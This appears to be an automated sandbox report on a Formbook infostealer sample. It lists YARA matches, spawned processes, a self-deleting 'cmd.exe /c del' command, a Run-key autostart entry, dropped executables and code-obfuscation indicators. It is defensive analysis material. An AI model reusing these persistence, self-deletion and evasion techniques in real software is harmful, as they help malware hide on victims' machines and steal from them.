Source: 0000000F.00000002.1100621842.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1106690716.0000000002996000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1227749827.0000000003120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.645802247.0000000002A56000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1229429028.00000000038EF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1227832562.0000000003150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1108926562.0000000002B96000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ACre0O2rKa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Classification labelShow sources
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/6@8/3
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeFile created: C:\Users\user\AppData\Roaming\8KA1218AJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Uolmxh0Jump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: ACre0O2rKa.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)Show sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample is known by AntivirusShow sources
Source: ACre0O2rKa.exeVirustotal: Detection: 74%
Source: ACre0O2rKa.exeReversingLabs: Detection: 82%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\ACre0O2rKa.exe 'C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: unknownProcess created: C:\Users\user\Desktop\ACre0O2rKa.exe C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ACre0O2rKa.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: unknownProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess created: C:\Users\user\Desktop\ACre0O2rKa.exe C:\Users\user\Desktop\ACre0O2rKa.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe 'C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe' Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ACre0O2rKa.exe'Jump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe'Jump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe' Jump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess created: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeFile written: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.iniJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: WWAHost.pdb source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp
Source: Binary string: wscript.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp, WWAHost.exe, 00000003.00000002.1228048773.00000000033C0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1109567888.0000000006EEF000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ACre0O2rKa.exe, WWAHost.exe, 5jd0x8e0uzsd8l.exe, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp
Source: Binary string: wscript.pdb source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp
Source: Binary string: cmstp.pdb source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp
Source: Binary string: msdt.pdb source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeUnpacked PE file: 1.2.ACre0O2rKa.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeUnpacked PE file: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeUnpacked PE file: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeUnpacked PE file: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402E40 push 004012B8h; ret 0_2_00402E53
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402A44 push 004012B8h; ret 0_2_00402A57
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403444 push 004012B8h; ret 0_2_00403457
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403048 push 004012B8h; ret 0_2_0040305B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402C4C push 004012B8h; ret 0_2_00402C5F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402850 push 004012B8h; ret 0_2_00402863
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403250 push 004012B8h; ret 0_2_00403263
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402E54 push 004012B8h; ret 0_2_00402E67
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402A58 push 004012B8h; ret 0_2_00402A6B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403458 push 004012B8h; ret 0_2_0040346B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_0040305C push 004012B8h; ret 0_2_0040306F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402C60 push 004012B8h; ret 0_2_00402C73
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402864 push 004012B8h; ret 0_2_00402877
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403264 push 004012B8h; ret 0_2_00403277
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402E68 push 004012B8h; ret 0_2_00402E7B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402A6C push 004012B8h; ret 0_2_00402A7F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_0040346C push 004012B8h; ret 0_2_0040347F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403070 push 004012B8h; ret 0_2_00403083
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402C74 push 004012B8h; ret 0_2_00402C87
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402878 push 004012B8h; ret 0_2_0040288B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403278 push 004012B8h; ret 0_2_0040328B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402E7C push 004012B8h; ret 0_2_00402E8F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402800 push 004012B8h; ret 0_2_00402813
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403200 push 004012B8h; ret 0_2_00403213
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402E04 push 004012B8h; ret 0_2_00402E17
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402A08 push 004012B8h; ret 0_2_00402A1B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403408 push 004012B8h; ret 0_2_0040341B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_0040300C push 004012B8h; ret 0_2_0040301F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402C10 push 004012B8h; ret 0_2_00402C23
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00402814 push 004012B8h; ret 0_2_00402827
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_00403214 push 004012B8h; ret 0_2_00403227

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ACre0O2rKa.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
